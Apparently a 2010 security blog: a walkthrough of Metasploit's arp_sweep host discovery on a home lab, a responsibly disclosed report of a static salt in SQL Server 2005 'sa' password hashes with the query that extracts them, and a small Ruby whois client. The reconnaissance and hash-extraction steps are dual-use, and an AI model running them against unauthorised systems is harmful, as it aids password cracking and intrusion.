First thing's first, the arp_sweep module relies on pcaprub. Because I'm using Ubuntu 9.10 (Karmic Koala) vs. something like Backtrack, this module was not already configured. I found a great post over at darkoperator.com which explained, among other things, how to get this working. Here are the steps I took:

From inside my metasploit svn trunk directory (~/src/svn/metasploit/framework3/trunk in my case), I ran the following:
   $ cd external/pcaprub
$ ruby extconf.rb && make
$ sudo make install


Note that you need to have the libpcap-dev package in order for the compile of pcaprub to work.

Once I had that done, I returned to the main trunk directory, and ran msfconsole as root (that last bit is important, the arp sweep must be run as root in linux as far as I can tell, due to the fact that the module puts the interface into promiscuous mode to capture the ARP replies):

root:~/msf# ./msfconsole 

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 528 exploits - 248 auxiliary
+ -- --=[ 196 payloads - 23 encoders - 8 nops
=[ svn r8703 updated today (2010.03.03)


The next thing that happens when I load msfconsole is that a bunch of stuff I have set in my msfconsole.rc gets loaded. If you want more information on what that means, Mubix has a great introduction to metasploit rc files at his practical exploitation site. Here's what it looks like:

resource (/root/.msf3/msfconsole.rc)> color false
resource (/root/.msf3/msfconsole.rc)> setg RHOSTS 10.0.1.0/24
RHOSTS => 10.0.1.0/24
resource (/root/.msf3/msfconsole.rc)> setg RHOST 10.0.1.75
RHOST => 10.0.1.75
resource (/root/.msf3/msfconsole.rc)> setg LHOST 10.0.1.51
LHOST => 10.0.1.51


The LHOST setting reflects the IP address of my testing host, the RHOST setting is a victim host I have on my network specifically to attack, and the RHOSTS is my lab network. The color false is there for a few reasons, one of them being that I like transparent term windows and color text sometimes doesn't play well with that.

The next step is to load the arp_sweep module and check out what options it takes. The module is in the auxiliary tree within metasploit, and can be loaded like so:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
RHOSTS 10.0.1.0/24 yes The target address range or CIDR identifier
SHOST yes Source IP Address
SMAC yes Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The number of seconds to wait for new data


You can see here some of the effects of the resource file that was loaded earlier, the RHOSTS option is already set for me. I need to set a couple of other things though to make this work, like the source IP address and MAC, as well as the aforementioned INTERFACE setting:

msf auxiliary(arp_sweep) > set SHOST 10.0.1.51
SHOST => 10.0.1.51
msf auxiliary(arp_sweep) > set INTERFACE wlan0
INTERFACE => wlan0


To set the SMAC option, I need to find the MAC address of my network adapter. Because I'm using wireless for my testing, I need to grab that information from the wlan0 interface. Fortunately, ifconfig provides this information. Even more fortunately, metasploit allows system commands to be run from within the console, so I can get this quite easily. :
msf auxiliary(arp_sweep) > ifconfig wlan0
[*] exec: ifconfig wlan0

wlan0 Link encap:Ethernet HWaddr 00:1b:77:df:e9:ae
inet addr:10.0.1.51 Bcast:10.0.1.255 Mask:255.255.255.0
inet6 addr: fe80::21b:77ff:fedf:e9ae/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8229414 errors:0 dropped:0 overruns:0 frame:0
TX packets:12543574 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2582588276 (2.5 GB) TX bytes:797473527 (797.4 MB)


Now that I have the MAC address (it's presented in the HWaddr string above), I can set the last option:

msf auxiliary(arp_sweep) > set SMAC 00:1b:77:df:e9:ae
SMAC => 00:1b:77:df:e9:ae


One more thing to change; I like to increase the thread count to keep things moving quickly:
msf auxiliary(arp_sweep) > set THREADS 20
THREADS => 20


Now I run show options once more to make sure the changes I made look right:
msf auxiliary(arp_sweep) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE wlan0 no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
RHOSTS 10.0.1.0/24 yes The target address range or CIDR identifier
SHOST 10.0.1.51 yes Source IP Address
SMAC 00:1b:77:df:e9:ae yes Source MAC Address
THREADS 20 yes The number of concurrent threads
TIMEOUT 500 yes The number of seconds to wait for new data


And then I can run the module:
msf auxiliary(arp_sweep) > run

[*] 10.0.1.1 appears to be up.
[*] 10.0.1.2 appears to be up.
[*] 10.0.1.5 appears to be up.
[*] 10.0.1.18 appears to be up.
[*] 10.0.1.49 appears to be up.
[*] 10.0.1.50 appears to be up.
[*] 10.0.1.75 appears to be up.
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


Excellent! I got a nice list of live hosts on the local network segement using ARP.

I'll talk about why this is useful (over something like tcp portscanning the local network) in a blog post soon.

[edit]
I should mention by the way: if you wanted to do this outside of metasploit, you could do something like the following:

$ for i in `seq 0 254`; do sudo arping -I wlan0 -c1 -f 10.0.1.$i; done |grep Unicast


The results aren't nearly as pretty (nor are they as quickly gotten):
Unicast reply from 10.0.1.1 [00:0E:08:ED:A8:B1]  2.028ms
Unicast reply from 10.0.1.2 [00:15:62:FF:D6:06] 1.248ms
Unicast reply from 10.0.1.5 [00:20:00:38:20:6C] 2.548ms
Unicast reply from 10.0.1.18 [00:1D:73:A4:0A:AD] 1.182ms
Unicast reply from 10.0.1.49 [00:1F:3C:CD:50:1C] 1.652ms
Unicast reply from 10.0.1.50 [00:21:97:47:6C:80] 1.766ms
Unicast reply from 10.0.1.75 [00:02:55:42:08:0D] 1.203ms

02 March 2010

SQL Server 2005 (and 2008) Static Salt

While performing a database security review for a client, I noticed that the password hashes for the 'sa' user in the master.sys.sql_logins table all had the same salt. This was true on 4 separate SQL server instances across 4 different hosts.

Naturally, this piqued my curiousity, so I proceeded to investigate on as many SQL Server 2005 instances as I could get my hands on, and found that the salt was the same across the board.

To expound a bit:
If you run the following SQL statement:
SELECT password_hash FROM master.sys.sql_logins WHERE name = 'sa'

the whole password hash looks something like this:
0x01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21


The way that value breaks down is like so:
0x         : this is a hex value (the column is of type varbinary)
0100 : "throw away" constant bytes
4086CEB6 : the hash salt

the remainder of the value is the hashed password value.

Since we're only interested in bytes 3 - 6, we can use the SQL SUBSTRING() function to pull the part we care about like so:
  SELECT SUBSTRING(password_hash,3,4) AS sa_hash_bytes
FROM master.sys.sql_logins WHERE name = 'sa';


On each SQL Server instance I tested, the salt was the same
(0x4086CEB6)

This was true across Service Packs, and differing versions of both the DBMS platform as well as OS.

Here's the output from 'SELECT @@version' on my test instances (minus the date and copyright):
Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
Express Edition on Windows NT 6.0 (Build 6001: Service Pack 1)

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


I did some checking to see if this was a known issue, and was unable to find either an article/post describing this, nor an individual in the industry that had heard about it.

While this isn't a "sexy" BoF or anything, it does leaves SQL server administrative passwords open to password cracking (eg. by using a precomputed table of SHA1 hashes using the static known salt, one can dramatically decrease the time it takes to crack an sa user password...on any SQL Server 2005 or 2008 instance.) Additionally, once a password has been acquired, it may be possible to use that same password in other locations on a network if the administrators use a common password (or a common OS image for servers...).

The real risk this poses is fairly minor, since by default in the affected SQL Server versions normal users lack access to the column containing the password hash. However, there are a great deal of applications out there which use privileged accounts to access the database back end they use; and there are an even greater number of applications which contain SQL Injection vulnerabilities. In my mind, there's likely to be a fair amount of overlap in those 2 vectors, which would then leave a system potentially exposed to exploitation through this method.

Accordingly I decided to contact Microsoft. (I'll leave discussion about Full Disclosure for some other post) I have to say, it was pretty decent working with the MSRC, they were quite competent and very forthcoming. Whatever else can be said about Microsoft, it's clear that they have come a long way in dealing with vulnerabilities, which I am very happy to report.

The end result of all this is a Microsoft KB Article that explains more about the issue, along with some workarounds. According to that article, this will be fixed in SQL Server service packs at some point.

For those that are curious, the entire process took less than 3 months (I first reported the issue to Microsoft on December 11, 2009.) In my opinion, that's an acceptable time frame for a large company to address what is an admittedly minor security issue, particularly given the fact that there are a number of major (and minor) holidays which take place in that time span.

01 March 2010

playing with ruby

i started playing around with ruby recently.
one of the first things i figured i'd do is muck about with sockets.
it turns out that's brain dead easy with ruby, which i was happy to discover.
here's a quick and dirty whois client i whipped up as a way to learn the syntax etc.

require "socket"

rr = Array.new
whoisrv = "whois.arin.net"
port = "43"
qry = "208.105.198.137"

s = TCPSocket.open(whoisrv, port)
s.puts(qry)
while rr = s.gets
puts rr
end
s.close